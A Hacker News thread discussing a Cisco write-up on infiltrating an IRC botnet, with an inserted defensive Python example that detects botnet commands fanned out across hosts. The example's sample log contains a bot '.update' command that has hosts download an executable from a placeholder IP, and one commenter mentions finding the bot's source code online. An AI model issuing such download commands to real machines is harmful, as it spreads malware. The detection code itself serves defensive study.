
Infiltrating a Botnet - A Conversation With a Botmaster - jperras
http://www.cisco.com/web/about/security/intelligence/bots.html
======
allenbrunson
this is a good article. it's pretty clear that, if you had the know-how to
write your own botnet software, you could really clean up. you could design
your own communication protocol, rather than using irc the way everybody else
does, which would help evade detection. windows users are lucky that anybody
capable of such a thing probably already has a much more satisfying "real"
job.

too bad the article devolved into an ad for cisco products at the very end. i
was really digging it up to that point.

~~~
jonny_noog
Seconded. I liked it save for the Cisco advertising as well.

------
flashingpumpkin
nice read there. would make sense to post this link here too:
[http://philosecurity.org/2009/01/12/interview-with-an-adware...](http://philosecurity.org/2009/01/12/interview-with-an-adware-author)

~~~
tc
This is the kicker:

 _I got to write half of it in Scheme, which probably means that I deployed
more Scheme runtime than anybody else on the planet._

------
tsally
Solid set of info there. Anyone know or have a guess as to the forum the
botmaster linked to? Email's in profile if you don't feel like posting it for
the public.

~~~
verroq
The name of the bot is fatalzircd according to the guy and they didn't censor
that so it's not all lost. After googling that name I found several forums and
easily found one with a source code download.

------
fishercs
He mentioned old school and then quoted 2005. I don't know if it's just me, but
the idea of a botnet is certainly nothing new, and definitely spawned from
IRC. FWIW you could date the article 1999 and throw in mentions of wingates a
couple of times and sprinkle on some SOCKS proxy information for flavor and
I'd know no different.

------
peregrine
I'd be interested in seeing the code. I've always wanted to see what that side
of the wall does.

------
falsestprophet
Is it possible to monitor bot nets to figure out what they are doing?

~~~
hedgehog
Yep, but it's a lot of work. There are at least a few researchers that keep track
of bot activity, reverse samples, monitor via wire-compatible clients, etc.
From what I gather it's getting harder; some newer worms use decentralized
control channels, signed updates, etc.

One way to observe worm behavior: <http://www.honeynet.org/>

SRI writeup on their dissection of Storm: <http://www.cyber-ta.org/pubs/StormWorm/report/>

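The "monitor via wire-compatible clients" approach above amounts to speaking the bot's own protocol (IRC, in the classic case) and watching what the channel tells its members. A defender who already has IRC traffic in sensor logs can apply the same idea without joining anything: parse the protocol and look for one message fanned out to many hosts. The following is an added example, not code from the article or from any of the commenters; the log format (`<timestamp> <src_ip> <raw IRC line>`) and the sample lines are constructed for illustration, and the `.`/`!` command-prefix convention is an assumption about how such channels are typically driven.

```python
import re
from collections import defaultdict

# Constructed sample of IRC traffic as a network sensor might record it:
# "<timestamp> <src_ip> <raw IRC line>". Not taken from the article.
# 203.0.113.0/24 is a documentation range, used here as a placeholder.
SAMPLE_LOG = """\
1234567890 10.0.0.5 :bot1!u@10.0.0.5 JOIN #ctrl
1234567891 10.0.0.6 :bot2!u@10.0.0.6 JOIN #ctrl
1234567892 10.0.0.7 :bot3!u@10.0.0.7 JOIN #ctrl
1234567900 10.0.0.5 :boss!o@203.0.113.9 PRIVMSG #ctrl :.update http://203.0.113.9/u.exe
1234567900 10.0.0.6 :boss!o@203.0.113.9 PRIVMSG #ctrl :.update http://203.0.113.9/u.exe
1234567900 10.0.0.7 :boss!o@203.0.113.9 PRIVMSG #ctrl :.update http://203.0.113.9/u.exe
1234567950 10.0.0.8 :alice!a@10.0.0.8 JOIN #chat
1234567951 10.0.0.8 :bob!b@10.0.0.9 PRIVMSG #chat :hi there
"""

# RFC 1459 wire format: "[:prefix] COMMAND params [:trailing]".
IRC_RE = re.compile(
    r'^(?::(?P<prefix>\S+) )?'      # optional ":nick!user@host " prefix
    r'(?P<command>\S+)'             # command or numeric reply
    r'(?: (?P<params>[^:]*?))?'     # middle parameters (no colon allowed)
    r'(?: :(?P<trailing>.*))?$'     # trailing parameter may contain anything
)


def parse_irc_line(raw):
    """Split one raw IRC line into prefix, command, params and trailing."""
    m = IRC_RE.match(raw)
    if not m:
        return None
    return {
        'prefix': m.group('prefix'),
        'command': m.group('command').upper(),
        'params': (m.group('params') or '').split(),
        'trailing': m.group('trailing'),
    }


def find_fanout_commands(log_text, min_hosts=3, cmd_prefixes=('.', '!')):
    """Return (channel, text, host_count) for channel messages that look like
    commands and were delivered to at least `min_hosts` distinct hosts.

    The prefix characters are an assumption about bot command syntax; tune
    them to whatever your own traffic shows."""
    receivers = defaultdict(set)  # (channel, message text) -> hosts that saw it
    for line in log_text.splitlines():
        _ts, src, raw = line.split(' ', 2)
        msg = parse_irc_line(raw)
        if not msg or msg['command'] != 'PRIVMSG' or not msg['params']:
            continue
        target = msg['params'][0]
        text = msg['trailing'] or ''
        if target.startswith('#') and text.startswith(cmd_prefixes):
            receivers[(target, text)].add(src)
    return sorted(
        (channel, text, len(hosts))
        for (channel, text), hosts in receivers.items()
        if len(hosts) >= min_hosts
    )


if __name__ == '__main__':
    for channel, text, n in find_fanout_commands(SAMPLE_LOG):
        print(f'{channel}: {n} hosts received {text!r}')
```

The useful signal here is the fan-out, not the message content: ordinary chat rarely delivers an identical prefixed line to many internal hosts at the same instant, whereas a command channel does exactly that. This is also why the custom-protocol point made earlier in the thread matters to defenders; the parser above is IRC-specific, so a bot that moves off IRC needs a new parser before the same fan-out logic can be applied.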
------
Estragon

    the researcher suggested a TOR audio conference

Audio over TOR? I thought it was too slow for that.

~~~
wizard_2
Skype wouldn't work, but all you need is a 12kbps stream. The problem with Tor
is that sometimes the nodes are very slow; you could probably pick a path that
showed itself to be faster, but as far as I know it's non-trivial.

~~~
eru
May work. Tor is not really that slow. It just has a lot of latency.

------
gnosis
A masterful bit of deception. Who would have guessed that a botmaster would be
so trusting?

~~~
whimsy
What did he have to lose? The researcher had already penetrated his botnet,
and if he was hidden behind an "anonymous proxy chain" then his identity
wasn't at risk, non?

~~~
allenbrunson
he had a _lot_ to lose. the "reporter" could have been collecting subtle
details, and trying to match them up with known real-world suspects.

in his position, i certainly wouldn't have talked. but it's probably a lonely
occupation, and who else are you going to talk to.

------
katamole
Interesting article, but the lack of subtlety in some parts made me cringe,
e.g.: "wanta be partners?".

